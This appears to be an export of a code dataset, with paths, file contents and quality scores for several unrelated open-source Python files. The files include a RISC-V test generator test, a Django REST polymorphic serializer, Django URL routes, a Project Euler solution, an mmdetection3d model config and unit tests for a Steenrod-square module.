# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES
# OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
# NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import RandomUtils
import StateTransition
from Enums import EStateElementType, EStateTransitionType
from State import State
import state_transition_test_utils
from base.Sequence import Sequence
from base.StateTransitionHandler import StateTransitionHandler
from riscv.EnvRISCV import EnvRISCV
from riscv.GenThreadRISCV import GenThreadRISCV
# A test StateTransitionHandler that defers to the default
# StateTransitionHandler some of the time.
class PartialStateTransitionHandlerTest(StateTransitionHandler):
# Execute the State change represented by the StateElement. Only instances
# of the StateElement types for which the StateTransitionHandler has been
# registered will be passed to this method. Other StateTransitionHandlers
# will process the other StateElement types. It is important to avoid
# making changes to entities represented by StateElements that have already
# been processed. Changes to entities represented by StateElements that
# will be processed later are permitted.
#
# @param aStateElem A StateElement object.
def processStateElement(self, aStateElem):
processed = False
# Randomly decide whether to process the StateElement or defer to the
# default implementation
if RandomUtils.random32(0, 1) == 1:
(mem_block_ptr_index,) = self.getArbitraryGprs(1, aExclude=(0,))
self.initializeMemoryBlock(mem_block_ptr_index, (aStateElem,))
self.genInstruction(
"FLD##RISCV",
{
"rd": aStateElem.getRegisterIndex(),
"rs1": mem_block_ptr_index,
"simm12": 0,
"NoRestriction": 1,
},
)
processed = True
return processed
# This test verifies that a StateTransition handler can process some of the
# StateElements and defer to the default StateTransitionHandler for the
# remaining StateElements.
class MainSequence(Sequence):
def __init__(self, aGenThread, aName=None):
super().__init__(aGenThread, aName)
self._mExpectedStateData = {}
def generate(self, **kargs):
state_trans_handler = PartialStateTransitionHandlerTest(self.genThread)
StateTransition.registerStateTransitionHandler(
state_trans_handler,
EStateTransitionType.Explicit,
(EStateElementType.FloatingPointRegister,),
)
test_utils = state_transition_test_utils
state = self._createState()
StateTransition.transitionToState(state)
test_utils.verify_state(self, self._mExpectedStateData)
# Create a simple State to test an explicit StateTransition.
def _createState(self):
state = State()
test_utils = state_transition_test_utils
self._mExpectedStateData[
EStateElementType.FloatingPointRegister
] = test_utils.add_random_floating_point_register_state_elements(
self, state, RandomUtils.random32(0, 15)
)
return state
MainSequenceClass = MainSequence
GenThreadClass = GenThreadRISCV
EnvClass = EnvRISCV
| #
# Copyright (C) [2020] Futurewei Technologies, Inc.
#
# FORCE-RISCV is licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES
# OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
# NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import RandomUtils
import StateTransition
from Enums import EStateElementType, EStateTransitionType
from State import State
import state_transition_test_utils
from base.Sequence import Sequence
from base.StateTransitionHandler import StateTransitionHandler
from riscv.EnvRISCV import EnvRISCV
from riscv.GenThreadRISCV import GenThreadRISCV
# A test StateTransitionHandler that defers to the default
# StateTransitionHandler some of the time.
class PartialStateTransitionHandlerTest(StateTransitionHandler):
# Execute the State change represented by the StateElement. Only instances
# of the StateElement types for which the StateTransitionHandler has been
# registered will be passed to this method. Other StateTransitionHandlers
# will process the other StateElement types. It is important to avoid
# making changes to entities represented by StateElements that have already
# been processed. Changes to entities represented by StateElements that
# will be processed later are permitted.
#
# @param aStateElem A StateElement object.
def processStateElement(self, aStateElem):
processed = False
# Randomly decide whether to process the StateElement or defer to the
# default implementation
if RandomUtils.random32(0, 1) == 1:
(mem_block_ptr_index,) = self.getArbitraryGprs(1, aExclude=(0,))
self.initializeMemoryBlock(mem_block_ptr_index, (aStateElem,))
self.genInstruction(
"FLD##RISCV",
{
"rd": aStateElem.getRegisterIndex(),
"rs1": mem_block_ptr_index,
"simm12": 0,
"NoRestriction": 1,
},
)
processed = True
return processed
# This test verifies that a StateTransition handler can process some of the
# StateElements and defer to the default StateTransitionHandler for the
# remaining StateElements.
class MainSequence(Sequence):
def __init__(self, aGenThread, aName=None):
super().__init__(aGenThread, aName)
self._mExpectedStateData = {}
def generate(self, **kargs):
state_trans_handler = PartialStateTransitionHandlerTest(self.genThread)
StateTransition.registerStateTransitionHandler(
state_trans_handler,
EStateTransitionType.Explicit,
(EStateElementType.FloatingPointRegister,),
)
test_utils = state_transition_test_utils
state = self._createState()
StateTransition.transitionToState(state)
test_utils.verify_state(self, self._mExpectedStateData)
# Create a simple State to test an explicit StateTransition.
def _createState(self):
state = State()
test_utils = state_transition_test_utils
self._mExpectedStateData[
EStateElementType.FloatingPointRegister
] = test_utils.add_random_floating_point_register_state_elements(
self, state, RandomUtils.random32(0, 15)
)
return state
MainSequenceClass = MainSequence
GenThreadClass = GenThreadRISCV
EnvClass = EnvRISCV | en | 0.835595 | # # Copyright (C) [2020] Futurewei Technologies, Inc. # # FORCE-RISCV is licensed under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES # OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO # NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE. # See the License for the specific language governing permissions and # limitations under the License. # # A test StateTransitionHandler that defers to the default # StateTransitionHandler some of the time. # Execute the State change represented by the StateElement. Only instances # of the StateElement types for which the StateTransitionHandler has been # registered will be passed to this method. Other StateTransitionHandlers # will process the other StateElement types. It is important to avoid # making changes to entities represented by StateElements that have already # been processed. Changes to entities represented by StateElements that # will be processed later are permitted. # # @param aStateElem A StateElement object. # Randomly decide whether to process the StateElement or defer to the # default implementation ##RISCV", # This test verifies that a StateTransition handler can process some of the # StateElements and defer to the default StateTransitionHandler for the # remaining StateElements. # Create a simple State to test an explicit StateTransition. | 1.94623 | 2 |
polymorphic/serializers.py | wlongo/django-polymorphic | 0 | 6612433 | from collections.abc import Mapping
from six import string_types
from django.core.exceptions import ImproperlyConfigured
from django.db import models
from rest_framework import serializers
from rest_framework.fields import empty
# NOTES: Code extracted from the project django-rest-polymorphic ! ( https://github.com/apirobot/django-rest-polymorphic )
class PolymorphicSerializer( serializers.Serializer ):
model_serializer_mapping = None
resource_type_field_name = 'resourcetype'
def __new__( cls, *args, **kwargs ):
if cls.model_serializer_mapping is None:
raise ImproperlyConfigured(
'`{cls}` is missing a '
'`{cls}.model_serializer_mapping` attribute'.format(
cls = cls.__name__
)
)
if not isinstance( cls.resource_type_field_name, string_types ):
raise ImproperlyConfigured(
'`{cls}.resource_type_field_name` must be a string'.format(
cls = cls.__name__
)
)
return super().__new__( cls, *args, **kwargs )
def __init__( self, *args, **kwargs ):
super().__init__( *args, **kwargs )
model_serializer_mapping = self.model_serializer_mapping
self.model_serializer_mapping = { }
self.resource_type_model_mapping = { }
for model, serializer in model_serializer_mapping.items():
resource_type = self.to_resource_type( model )
if callable( serializer ):
serializer = serializer( *args, **kwargs )
serializer.parent = self
self.resource_type_model_mapping[resource_type] = model
self.model_serializer_mapping[model] = serializer
# ----------
# Public API
def to_resource_type( self, model_or_instance ):
return model_or_instance._meta.object_name
def to_representation( self, instance ):
if isinstance( instance, Mapping ):
resource_type = self._get_resource_type_from_mapping( instance )
serializer = self._get_serializer_from_resource_type( resource_type )
else:
resource_type = self.to_resource_type( instance )
serializer = self._get_serializer_from_model_or_instance( instance )
ret = serializer.to_representation( instance )
ret[self.resource_type_field_name] = resource_type
return ret
def to_internal_value( self, data ):
resource_type = self._get_resource_type_from_mapping( data )
serializer = self._get_serializer_from_resource_type( resource_type )
ret = serializer.to_internal_value( data )
ret[self.resource_type_field_name] = resource_type
return ret
def create( self, validated_data ):
resource_type = validated_data.pop( self.resource_type_field_name )
serializer = self._get_serializer_from_resource_type( resource_type )
return serializer.create( validated_data )
def update( self, instance, validated_data ):
resource_type = validated_data.pop( self.resource_type_field_name )
serializer = self._get_serializer_from_resource_type( resource_type )
return serializer.update( instance, validated_data )
def is_valid( self, *args, **kwargs ):
valid = super().is_valid( *args, **kwargs )
try:
resource_type = self._get_resource_type_from_mapping( self.validated_data )
serializer = self._get_serializer_from_resource_type( resource_type )
except serializers.ValidationError:
child_valid = False
else:
child_valid = serializer.is_valid( *args, **kwargs )
self._errors.update( serializer.errors )
return valid and child_valid
def run_validation( self, data = empty ):
resource_type = self._get_resource_type_from_mapping( data )
serializer = self._get_serializer_from_resource_type( resource_type )
validated_data = serializer.run_validation( data )
validated_data[self.resource_type_field_name] = resource_type
return validated_data
# --------------
# Implementation
def _to_model( self, model_or_instance ):
return (model_or_instance.__class__
if isinstance( model_or_instance, models.Model )
else model_or_instance)
def _get_resource_type_from_mapping( self, mapping ):
try:
return mapping[self.resource_type_field_name]
except KeyError:
raise serializers.ValidationError( {
self.resource_type_field_name: 'This field is required',
} )
def _get_serializer_from_model_or_instance( self, model_or_instance ):
model = self._to_model( model_or_instance )
for klass in model.mro():
if klass in self.model_serializer_mapping:
return self.model_serializer_mapping[klass]
raise KeyError(
'`{cls}.model_serializer_mapping` is missing '
'a corresponding serializer for `{model}` model'.format(
cls = self.__class__.__name__,
model = model.__name__
)
)
def _get_serializer_from_resource_type( self, resource_type ):
try:
model = self.resource_type_model_mapping[resource_type]
except KeyError:
raise serializers.ValidationError( {
self.resource_type_field_name: 'Invalid {0}'.format(
self.resource_type_field_name
)
} )
return self._get_serializer_from_model_or_instance( model )
class Meta:
pass
| from collections.abc import Mapping
from six import string_types
from django.core.exceptions import ImproperlyConfigured
from django.db import models
from rest_framework import serializers
from rest_framework.fields import empty
# NOTES: Code extracted from the project django-rest-polymorphic ! ( https://github.com/apirobot/django-rest-polymorphic )
class PolymorphicSerializer( serializers.Serializer ):
model_serializer_mapping = None
resource_type_field_name = 'resourcetype'
def __new__( cls, *args, **kwargs ):
if cls.model_serializer_mapping is None:
raise ImproperlyConfigured(
'`{cls}` is missing a '
'`{cls}.model_serializer_mapping` attribute'.format(
cls = cls.__name__
)
)
if not isinstance( cls.resource_type_field_name, string_types ):
raise ImproperlyConfigured(
'`{cls}.resource_type_field_name` must be a string'.format(
cls = cls.__name__
)
)
return super().__new__( cls, *args, **kwargs )
def __init__( self, *args, **kwargs ):
super().__init__( *args, **kwargs )
model_serializer_mapping = self.model_serializer_mapping
self.model_serializer_mapping = { }
self.resource_type_model_mapping = { }
for model, serializer in model_serializer_mapping.items():
resource_type = self.to_resource_type( model )
if callable( serializer ):
serializer = serializer( *args, **kwargs )
serializer.parent = self
self.resource_type_model_mapping[resource_type] = model
self.model_serializer_mapping[model] = serializer
# ----------
# Public API
def to_resource_type( self, model_or_instance ):
return model_or_instance._meta.object_name
def to_representation( self, instance ):
if isinstance( instance, Mapping ):
resource_type = self._get_resource_type_from_mapping( instance )
serializer = self._get_serializer_from_resource_type( resource_type )
else:
resource_type = self.to_resource_type( instance )
serializer = self._get_serializer_from_model_or_instance( instance )
ret = serializer.to_representation( instance )
ret[self.resource_type_field_name] = resource_type
return ret
def to_internal_value( self, data ):
resource_type = self._get_resource_type_from_mapping( data )
serializer = self._get_serializer_from_resource_type( resource_type )
ret = serializer.to_internal_value( data )
ret[self.resource_type_field_name] = resource_type
return ret
def create( self, validated_data ):
resource_type = validated_data.pop( self.resource_type_field_name )
serializer = self._get_serializer_from_resource_type( resource_type )
return serializer.create( validated_data )
def update( self, instance, validated_data ):
resource_type = validated_data.pop( self.resource_type_field_name )
serializer = self._get_serializer_from_resource_type( resource_type )
return serializer.update( instance, validated_data )
def is_valid( self, *args, **kwargs ):
valid = super().is_valid( *args, **kwargs )
try:
resource_type = self._get_resource_type_from_mapping( self.validated_data )
serializer = self._get_serializer_from_resource_type( resource_type )
except serializers.ValidationError:
child_valid = False
else:
child_valid = serializer.is_valid( *args, **kwargs )
self._errors.update( serializer.errors )
return valid and child_valid
def run_validation( self, data = empty ):
resource_type = self._get_resource_type_from_mapping( data )
serializer = self._get_serializer_from_resource_type( resource_type )
validated_data = serializer.run_validation( data )
validated_data[self.resource_type_field_name] = resource_type
return validated_data
# --------------
# Implementation
def _to_model( self, model_or_instance ):
return (model_or_instance.__class__
if isinstance( model_or_instance, models.Model )
else model_or_instance)
def _get_resource_type_from_mapping( self, mapping ):
try:
return mapping[self.resource_type_field_name]
except KeyError:
raise serializers.ValidationError( {
self.resource_type_field_name: 'This field is required',
} )
def _get_serializer_from_model_or_instance( self, model_or_instance ):
model = self._to_model( model_or_instance )
for klass in model.mro():
if klass in self.model_serializer_mapping:
return self.model_serializer_mapping[klass]
raise KeyError(
'`{cls}.model_serializer_mapping` is missing '
'a corresponding serializer for `{model}` model'.format(
cls = self.__class__.__name__,
model = model.__name__
)
)
def _get_serializer_from_resource_type( self, resource_type ):
try:
model = self.resource_type_model_mapping[resource_type]
except KeyError:
raise serializers.ValidationError( {
self.resource_type_field_name: 'Invalid {0}'.format(
self.resource_type_field_name
)
} )
return self._get_serializer_from_model_or_instance( model )
class Meta:
pass
| en | 0.578828 | # NOTES: Code extracted from the project django-rest-polymorphic ! ( https://github.com/apirobot/django-rest-polymorphic ) # ---------- # Public API # -------------- # Implementation | 2.012013 | 2 |
ast-transformations-core/src/test/resources/org/jetbrains/research/ml/ast/transformations/anonymization/data/classes_and_methods/in_1_basic.py | JetBrains-Research/ast-transformations | 8 | 6612434 | <filename>ast-transformations-core/src/test/resources/org/jetbrains/research/ml/ast/transformations/anonymization/data/classes_and_methods/in_1_basic.py<gh_stars>1-10
class C:
def __init__(self):
pass
def foo(self, foo, bar):
print(foo, bar, self)
def bar(self):
pass
@classmethod
def class_baz(cls, x):
pass
@staticmethod
def static_yep(a, b, c):
pass | <filename>ast-transformations-core/src/test/resources/org/jetbrains/research/ml/ast/transformations/anonymization/data/classes_and_methods/in_1_basic.py<gh_stars>1-10
class C:
def __init__(self):
pass
def foo(self, foo, bar):
print(foo, bar, self)
def bar(self):
pass
@classmethod
def class_baz(cls, x):
pass
@staticmethod
def static_yep(a, b, c):
pass | none | 1 | 2.413576 | 2 | |
blog/urls.py | mfarjami/Django-project-blog | 1 | 6612435 | from django.urls import path, re_path
from .views import *
app_name = 'blog'
urlpatterns = [
path('', ArticleList.as_view(), name='home'),
path('all/', ArticleAllList.as_view(), name='all-posts'),
# path('all/page/<int:page>', ArticleList.as_view(), name='home'),
path('article/<slug:slug>', ArticleDetail.as_view(), name='detail'),
path('preview/<int:pk>', ArticlePreview.as_view(), name='preview'),
path('category/<slug:slug>/', CategoryList.as_view(), name='category'),
path('author/<slug:username>/', AuthorList.as_view(), name='author'),
path('search/', SearchList.as_view(), name='search'),
] | from django.urls import path, re_path
from .views import *
app_name = 'blog'
urlpatterns = [
path('', ArticleList.as_view(), name='home'),
path('all/', ArticleAllList.as_view(), name='all-posts'),
# path('all/page/<int:page>', ArticleList.as_view(), name='home'),
path('article/<slug:slug>', ArticleDetail.as_view(), name='detail'),
path('preview/<int:pk>', ArticlePreview.as_view(), name='preview'),
path('category/<slug:slug>/', CategoryList.as_view(), name='category'),
path('author/<slug:username>/', AuthorList.as_view(), name='author'),
path('search/', SearchList.as_view(), name='search'),
] | en | 0.130941 | # path('all/page/<int:page>', ArticleList.as_view(), name='home'), | 2.104348 | 2 |
p007.py | anadahalli/project-euler | 1 | 6612436 | <gh_stars>1-10
"""Problem 007
By listing the first six prime numbers: 2, 3, 5, 7, 11, and 13, we can see that
the 6th prime is 13.
What is the 10 001st prime number?
"""
from math import sqrt
is_prime = lambda n: not any([n % i == 0 for i in range(2, int(sqrt(n))+1)])
def nth_prime(n):
count = 0
prime = 2
while True:
if is_prime(prime):
count += 1
if count == n:
return prime
prime += 1
ans = nth_prime(10001)
print(ans)
| """Problem 007
By listing the first six prime numbers: 2, 3, 5, 7, 11, and 13, we can see that
the 6th prime is 13.
What is the 10 001st prime number?
"""
from math import sqrt
is_prime = lambda n: not any([n % i == 0 for i in range(2, int(sqrt(n))+1)])
def nth_prime(n):
count = 0
prime = 2
while True:
if is_prime(prime):
count += 1
if count == n:
return prime
prime += 1
ans = nth_prime(10001)
print(ans) | en | 0.955163 | Problem 007 By listing the first six prime numbers: 2, 3, 5, 7, 11, and 13, we can see that the 6th prime is 13. What is the 10 001st prime number? | 3.952994 | 4 |
configs/_base_/models/dgcnn.py | maskjp/mmdetection3d | 5 | 6612437 | # model settings
model = dict(
type='EncoderDecoder3D',
backbone=dict(
type='DGCNNBackbone',
in_channels=9, # [xyz, rgb, normal_xyz], modified with dataset
num_samples=(20, 20, 20),
knn_modes=('D-KNN', 'F-KNN', 'F-KNN'),
radius=(None, None, None),
gf_channels=((64, 64), (64, 64), (64, )),
fa_channels=(1024, ),
act_cfg=dict(type='LeakyReLU', negative_slope=0.2)),
decode_head=dict(
type='DGCNNHead',
fp_channels=(1216, 512),
channels=256,
dropout_ratio=0.5,
conv_cfg=dict(type='Conv1d'),
norm_cfg=dict(type='BN1d'),
act_cfg=dict(type='LeakyReLU', negative_slope=0.2),
loss_decode=dict(
type='CrossEntropyLoss',
use_sigmoid=False,
class_weight=None, # modified with dataset
loss_weight=1.0)),
# model training and testing settings
train_cfg=dict(),
test_cfg=dict(mode='slide'))
| # model settings
model = dict(
type='EncoderDecoder3D',
backbone=dict(
type='DGCNNBackbone',
in_channels=9, # [xyz, rgb, normal_xyz], modified with dataset
num_samples=(20, 20, 20),
knn_modes=('D-KNN', 'F-KNN', 'F-KNN'),
radius=(None, None, None),
gf_channels=((64, 64), (64, 64), (64, )),
fa_channels=(1024, ),
act_cfg=dict(type='LeakyReLU', negative_slope=0.2)),
decode_head=dict(
type='DGCNNHead',
fp_channels=(1216, 512),
channels=256,
dropout_ratio=0.5,
conv_cfg=dict(type='Conv1d'),
norm_cfg=dict(type='BN1d'),
act_cfg=dict(type='LeakyReLU', negative_slope=0.2),
loss_decode=dict(
type='CrossEntropyLoss',
use_sigmoid=False,
class_weight=None, # modified with dataset
loss_weight=1.0)),
# model training and testing settings
train_cfg=dict(),
test_cfg=dict(mode='slide'))
| en | 0.794165 | # model settings # [xyz, rgb, normal_xyz], modified with dataset # modified with dataset # model training and testing settings | 1.820503 | 2 |
elvanto_sync/tests/test_elvanto.py | monty5811/elvanto_mail_sync | 4 | 6612438 | import pytest
import vcr
from django.core.management import call_command
from elvanto_sync import elvanto
from elvanto_sync.models import ElvantoGroup, ElvantoPerson
from elvanto_sync.tests.conftest import elvanto_vcr
@pytest.mark.django_db
class TestElvanto():
@elvanto_vcr
def test_pull_groups(self):
elvanto.pull_groups()
grp = ElvantoGroup.objects.get(e_id='7ebd2605-d3c7-11e4-95ba-068b656294b7')
assert str(grp) == 'All'
@elvanto_vcr
def test_pull_people(self):
elvanto.pull_people()
calvin = ElvantoPerson.objects.get(e_id='f7cfa258-d3c6-11e4-95ba-068b656294b7')
assert str(calvin) == '<NAME>'
assert calvin.email == '<EMAIL>'
chalmers = ElvantoPerson.objects.get(e_id='5a0a1cbc-d3c7-11e4-95ba-068b656294b7')
assert str(chalmers) == '<NAME>'
assert chalmers.email == '<EMAIL>'
knox = ElvantoPerson.objects.get(e_id='c1136264-d3c7-11e4-95ba-068b656294b7')
assert str(knox) == '<NAME>'
assert knox.email == ''
owen = ElvantoPerson.objects.get(e_id='48366137-d3c7-11e4-95ba-068b656294b7')
assert str(owen) == '<NAME>'
assert owen.email == '<EMAIL>'
@elvanto_vcr
def test_pull_groups(self):
elvanto.pull_people()
elvanto.pull_groups()
assert ElvantoGroup.objects.count() == 5
grp_all = ElvantoGroup.objects.get(e_id='7ebd2605-d3c7-11e4-95ba-068b656294b7')
e_emails = grp_all.elvanto_emails()
assert '<EMAIL>' in e_emails
assert '<EMAIL>' in e_emails
assert '<EMAIL>' in e_emails
assert grp_all.group_members.count() == 3
@elvanto_vcr
def test_refresh_data(self):
elvanto.refresh_elvanto_data()
@elvanto_vcr
def test_refresh_pull_management_command(self):
call_command('pull_from_elvanto')
@elvanto_vcr
def test_delete_old_groups(self):
elvanto.refresh_elvanto_data()
assert ElvantoGroup.objects.count() == 5
assert ElvantoPerson.objects.count() == 11
# construct synthetic elvanto data:
data = {
'groups': {
'group': [{
'id': '7ebd2605-d3c7-11e4-95ba-068b656294b7',
}]
}
}
elvanto.delete_missing_groups(data)
# check:
assert ElvantoGroup.objects.count() == 1
assert ElvantoPerson.objects.count() == 11
| import pytest
import vcr
from django.core.management import call_command
from elvanto_sync import elvanto
from elvanto_sync.models import ElvantoGroup, ElvantoPerson
from elvanto_sync.tests.conftest import elvanto_vcr
@pytest.mark.django_db
class TestElvanto():
@elvanto_vcr
def test_pull_groups(self):
elvanto.pull_groups()
grp = ElvantoGroup.objects.get(e_id='7ebd2605-d3c7-11e4-95ba-068b656294b7')
assert str(grp) == 'All'
@elvanto_vcr
def test_pull_people(self):
elvanto.pull_people()
calvin = ElvantoPerson.objects.get(e_id='f7cfa258-d3c6-11e4-95ba-068b656294b7')
assert str(calvin) == '<NAME>'
assert calvin.email == '<EMAIL>'
chalmers = ElvantoPerson.objects.get(e_id='5a0a1cbc-d3c7-11e4-95ba-068b656294b7')
assert str(chalmers) == '<NAME>'
assert chalmers.email == '<EMAIL>'
knox = ElvantoPerson.objects.get(e_id='c1136264-d3c7-11e4-95ba-068b656294b7')
assert str(knox) == '<NAME>'
assert knox.email == ''
owen = ElvantoPerson.objects.get(e_id='48366137-d3c7-11e4-95ba-068b656294b7')
assert str(owen) == '<NAME>'
assert owen.email == '<EMAIL>'
@elvanto_vcr
def test_pull_groups(self):
elvanto.pull_people()
elvanto.pull_groups()
assert ElvantoGroup.objects.count() == 5
grp_all = ElvantoGroup.objects.get(e_id='7ebd2605-d3c7-11e4-95ba-068b656294b7')
e_emails = grp_all.elvanto_emails()
assert '<EMAIL>' in e_emails
assert '<EMAIL>' in e_emails
assert '<EMAIL>' in e_emails
assert grp_all.group_members.count() == 3
@elvanto_vcr
def test_refresh_data(self):
elvanto.refresh_elvanto_data()
@elvanto_vcr
def test_refresh_pull_management_command(self):
call_command('pull_from_elvanto')
@elvanto_vcr
def test_delete_old_groups(self):
elvanto.refresh_elvanto_data()
assert ElvantoGroup.objects.count() == 5
assert ElvantoPerson.objects.count() == 11
# construct synthetic elvanto data:
data = {
'groups': {
'group': [{
'id': '7ebd2605-d3c7-11e4-95ba-068b656294b7',
}]
}
}
elvanto.delete_missing_groups(data)
# check:
assert ElvantoGroup.objects.count() == 1
assert ElvantoPerson.objects.count() == 11
| en | 0.511941 | # construct synthetic elvanto data: # check: | 2.035951 | 2 |
main.py | nikben08/news_parser | 0 | 6612439 | import rusbase_parser
import neurohive_parser
import ai_news_parser
import hi_news_parser
import vc_parser
import time
while True: # Цикл который по очереди запускает каждый парсер
rusbase_parser.rusbase_parser()
neurohive_parser.neurohive_parser()
ai_news_parser.ai_news_parser()
hi_news_parser.hi_news_parser()
vc_parser.vc_parser()
time.sleep(1800)
| import rusbase_parser
import neurohive_parser
import ai_news_parser
import hi_news_parser
import vc_parser
import time
while True: # Цикл который по очереди запускает каждый парсер
rusbase_parser.rusbase_parser()
neurohive_parser.neurohive_parser()
ai_news_parser.ai_news_parser()
hi_news_parser.hi_news_parser()
vc_parser.vc_parser()
time.sleep(1800)
| ru | 0.999116 | # Цикл который по очереди запускает каждый парсер | 1.47633 | 1 |
ksb_homology/Ssquares/test_squares.py | Edoldin/KSB_homology | 0 | 6612440 | import sys, os
ksb_homology_path_list=os.path.dirname(os.path.realpath(__file__)).split("\\")[0:-2]
ksb_homology_path= "\\".join(ksb_homology_path_list)
if ksb_homology_path not in sys.path:
sys.path.append(ksb_homology_path)
import unittest
from ksb_homology.Ssquares import Ssquares
class SsquaresTest(unittest.TestCase):
def setUpIncreaseValues(top,bot):
uddot=sorted(set(top).difference(set(bot)))
n=len(uddot)
parallel=[[]]
remain=[[]]
circ=[uddot]
for l in range(1,n):
parallel.append(circ[0][0:l])
circ.append(circ[0][l:n])
remain.append([])
return [parallel,circ,remain]
def test_calculate_index(self):
return 1
'''def test_kth_steenrod_square(self):
X=BS.proyective_2planes_product_element()
S=((),(1))
sol=kth_steenrod_square( 2, X, S)
self.assertEqual(kth_steenrod_square( 2, X, S), ((0,1),(1)) )'''
def test_increase1(self):
parallel, circ, remain = SsquaresTest.setUpIncreaseValues([0,1,2,3],[])
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
self.assertEqual(parallel,[[],[0],[0,1],[0,1,3]])
self.assertEqual(circ,[[0,1,2,3],[1,2,3],[2,3],[2]])
self.assertEqual(remain,[[],[],[],[]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 3)
self.assertEqual(stop, False)
def test_increase2(self):
parallel, circ, remain = SsquaresTest.setUpIncreaseValues([0,1,2,3],[])
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
self.assertEqual(parallel,[[], [0], [0,1], [0,1]])
self.assertEqual(circ,[[0,1,2,3], [1,2,3], [2,3], [2]])
self.assertEqual(remain,[[],[],[],[3]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 2)
self.assertEqual(level, 3)
self.assertEqual(stop, False)
def test_increase3(self):
parallel, circ, remain = SsquaresTest.setUpIncreaseValues([0,1,2,3],[])
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
self.assertEqual(parallel,[[], [0], [0,1], [0,1]])
self.assertEqual(circ,[[0,1,2,3], [1,2,3], [2,3], [3]])
self.assertEqual(remain,[[],[],[],[2]])
self.assertEqual(pivot, 0)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 3)
self.assertEqual(stop, False)
def test_increase4(self):
parallel, circ, remain = SsquaresTest.setUpIncreaseValues([0,1,2,3],[])
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
self.assertEqual(parallel,[[], [0], [0,2], [0,2,1]])
self.assertEqual(circ,[[0,1,2,3], [1,2,3], [1,3], [3]])
self.assertEqual(remain,[[],[],[],[]])
self.assertEqual(pivot, 1) #algorithm sais 1
self.assertEqual(parpivot, 1)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
def test_increase5(self):
parallel, circ, remain = SsquaresTest.setUpIncreaseValues([0,1,2,3],[])
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
self.assertEqual(parallel,[[], [0], [0,2], [0,2,3]])
self.assertEqual(circ,[[0,1,2,3], [1,2,3], [1,3], [1]])
self.assertEqual(remain,[[],[],[],[]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 3)
self.assertEqual(stop, False)
def test_complete_increase(self):
parallel, circ, remain = SsquaresTest.setUpIncreaseValues([0,1,2],[])
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #1
self.assertEqual(parallel,[[],[0],[0,2]])
self.assertEqual(circ,[[0,1,2],[1,2],[1]])
self.assertEqual(remain,[[],[],[]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #2
self.assertEqual(parallel,[[],[0],[0]])
self.assertEqual(circ,[[0,1,2],[1,2],[1]])
self.assertEqual(remain,[[],[],[2]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 2)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #3
self.assertEqual(parallel,[[],[0],[0]])
self.assertEqual(circ,[[0,1,2],[1,2],[2]])
self.assertEqual(remain,[[],[],[1]])
self.assertEqual(pivot, 0)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #4
self.assertEqual(parallel,[[],[1],[1,0]])
self.assertEqual(circ,[[0,1,2],[0,2],[2]])
self.assertEqual(remain,[[],[],[]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 1)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #5
self.assertEqual(parallel,[[],[1],[1,2]])
self.assertEqual(circ,[[0,1,2],[0,2],[0]])
self.assertEqual(remain,[[],[],[]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #6
self.assertEqual(parallel,[[],[1],[1]])
self.assertEqual(circ,[[0,1,2],[0,2],[0]])
self.assertEqual(remain,[[],[],[2]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 2)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
